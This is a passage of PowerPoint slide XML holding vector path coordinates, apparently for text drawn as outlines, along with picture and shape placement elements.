                    <a:pt x="606831" y="276529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616978" y="278803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622261" y="279387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633628" y="279387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656742" y="267728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657783" y="266700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660133" y="263105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663486" y="254723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663536" y="254584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664387" y="250101"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="720420" y="61633"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="713295" y="37909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712165" y="36372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708088" y="31978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708088" y="58864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664972" y="58864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665429" y="53911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665518" y="52857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667804" y="47891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675830" y="39916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681240" y="37909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694753" y="37909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699757" y="39738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706374" y="46990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708037" y="52133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708088" y="58864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708088" y="31978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706666" y="30441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698842" y="27470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688682" y="27470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654621" y="51066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652094" y="67602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652754" y="76403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683107" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683348" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691845" y="106553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696734" y="106553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701433" y="105943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710323" y="103505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714667" y="102019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718934" y="100215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718934" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718934" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718261" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716064" y="88379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712368" y="90385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701992" y="94488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696823" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687857" y="95504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684314" y="94957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677900" y="92798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675132" y="91198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672782" y="89027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670369" y="86842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668528" y="84137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665683" y="77139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664984" y="73113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664984" y="68491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720420" y="68491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720420" y="61633"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="789304" h="279400">
                  <a:moveTo>
                    <a:pt x="789203" y="30403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="785609" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774573" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771918" y="30403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764247" y="33782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759802" y="36639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754773" y="40678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754773" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742099" y="29832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="742099" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754773" y="104787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754773" y="51396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758139" y="48641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761657" y="46405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768921" y="42964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772198" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781126" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784669" y="42595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786701" y="42964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788390" y="43370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789063" y="43370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789063" y="42189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789063" y="40678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789063" y="30403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789203" y="30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3" name="object 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F12F0E-227C-6C64-1FE2-4268F7170C20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4738" y="2181135"/>
              <a:ext cx="625940" cy="691710"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD2267D-0199-7787-6AD5-624F601DDF20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3846106" y="2182787"/>
              <a:ext cx="3527425" cy="1786255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3527425" h="1786254">
                  <a:moveTo>
                    <a:pt x="1009446" y="940346"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1008265" y="926858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1013117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168" y="1026591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009446" y="940346"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3527425" h="1786254">
                  <a:moveTo>
                    <a:pt x="3526904" y="1775536"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2432126" y="933272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493376" y="10210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3484499" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417013" y="928484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421458" y="933589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417330" y="938949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3518649" y="1786242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3526904" y="1775536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5" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47192E14-0154-F58F-97D8-4DDA0CDF71CD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3583" y="2520101"/>
              <a:ext cx="2104789" cy="688553"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="object 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D3F8A1-2BA7-742F-5DF0-DF415FCC2CD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4738" y="3364991"/>
              <a:ext cx="625940" cy="691710"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B6BC0C4-B7EE-D9E1-12E6-855BCE9638D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3583" y="4090571"/>
              <a:ext cx="929406" cy="106885"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD10737B-290E-4467-A644-AAF0BCA24916}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="960520" y="4265285"/>
              <a:ext cx="734695" cy="105410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="33241" y="2300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13339" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13339" y="65190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33872" y="65190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39805" y="64334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49256" y="60884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53339" y="58290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57789" y="53825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13339" y="53825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13339" y="13755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59879" y="13755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57444" y="11116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50384" y="6404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46685" y="4825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38339" y="2796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33241" y="2300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="59879" y="13755"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30760" y="13755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34256" y="14048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39782" y="15266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42241" y="16258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46865" y="19279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48715" y="21354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49910" y="23925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51128" y="26473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51737" y="29494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51737" y="35899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51309" y="38582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29970" y="53825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57789" y="53825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59564" y="52044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61752" y="48752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64842" y="41175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65609" y="37049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65546" y="26473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64572" y="21940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60399" y="14319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59879" y="13755"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="110677" y="25255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78269" y="48538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75918" y="64988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76506" y="73702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103106" y="104008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110677" y="104675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118193" y="104008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124907" y="102008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130822" y="98682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135940" y="94031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136133" y="93761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103865" y="93761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98591" y="91348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89000" y="55246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90895" y="48008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98474" y="38537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103820" y="36169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136100" y="36169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135940" y="35944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130822" y="31267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124907" y="27927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118193" y="25923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110677" y="25255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="136100" y="36169"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="117467" y="36169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122767" y="38537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130391" y="48008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132309" y="55246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132309" y="74526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130459" y="81446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130391" y="81697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122700" y="91348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117421" y="93761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136133" y="93761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145369" y="64988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144781" y="56283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143015" y="48538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140068" y="41756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136100" y="36169"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="180128" y="27623"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="167474" y="27623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167474" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180128" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180128" y="49180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183512" y="46429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187008" y="44197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194294" y="40747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197578" y="39980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214437" y="39980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214437" y="38469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180128" y="38469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180128" y="27623"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="214437" y="39980"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="206497" y="39980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210038" y="40386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212055" y="40747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213760" y="41153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214437" y="41153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214437" y="39980"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="210963" y="27623"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199930" y="27623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197294" y="28187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189602" y="31569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185158" y="34433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180128" y="38469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214437" y="38469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214437" y="28187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214581" y="28187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210963" y="27623"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="241031" y="37996"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="228377" y="37996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228377" y="87109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230362" y="93738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238369" y="101992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244211" y="104066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254091" y="104066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="103863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262211" y="103051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264805" y="102533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266835" y="101992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267174" y="101992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267174" y="92949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251632" y="92949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249688" y="92633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249230" y="92633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245637" y="90920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241121" y="79307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241031" y="37996"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="267174" y="90514"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266497" y="90514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265504" y="90920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263903" y="91438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259414" y="92633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257249" y="92949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267174" y="92949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267174" y="90514"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="267174" y="27352"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="219828" y="27352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219828" y="37996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267174" y="37996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267174" y="27352"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="241031" y="5727"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="228377" y="5727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228377" y="27352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241031" y="27352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241031" y="5727"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="311023" y="27352"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294941" y="27352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294941" y="46542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311023" y="46542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311023" y="27352"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="311023" y="83388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294941" y="83388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294941" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311023" y="102578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311023" y="83388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="440024" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="420445" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412550" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400166" y="12582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397054" y="18874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397054" y="31524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412888" y="48639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412888" y="49045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394369" y="83659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397595" y="90829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430008" y="104878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437187" y="104350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443846" y="102767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449844" y="100131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455497" y="96241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457143" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423715" y="94843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418414" y="92859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410069" y="84944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407971" y="79938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407971" y="69137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409189" y="64852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413981" y="57479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414084" y="57321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417332" y="54344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421369" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452202" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446227" y="49586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446227" y="49180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451708" y="46700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452636" y="45933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437881" y="45933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434926" y="45076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410587" y="20272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412414" y="16641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419512" y="11342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419323" y="11342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424279" y="9899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457325" y="9899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448149" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448382" y="2525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440024" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="734694" h="105410">
                  <a:moveTo>
                    <a:pt x="452202" y="52134"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="421369" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425565" y="53668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428903" y="54840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433933" y="56554"/>
                  </a:lnTo>
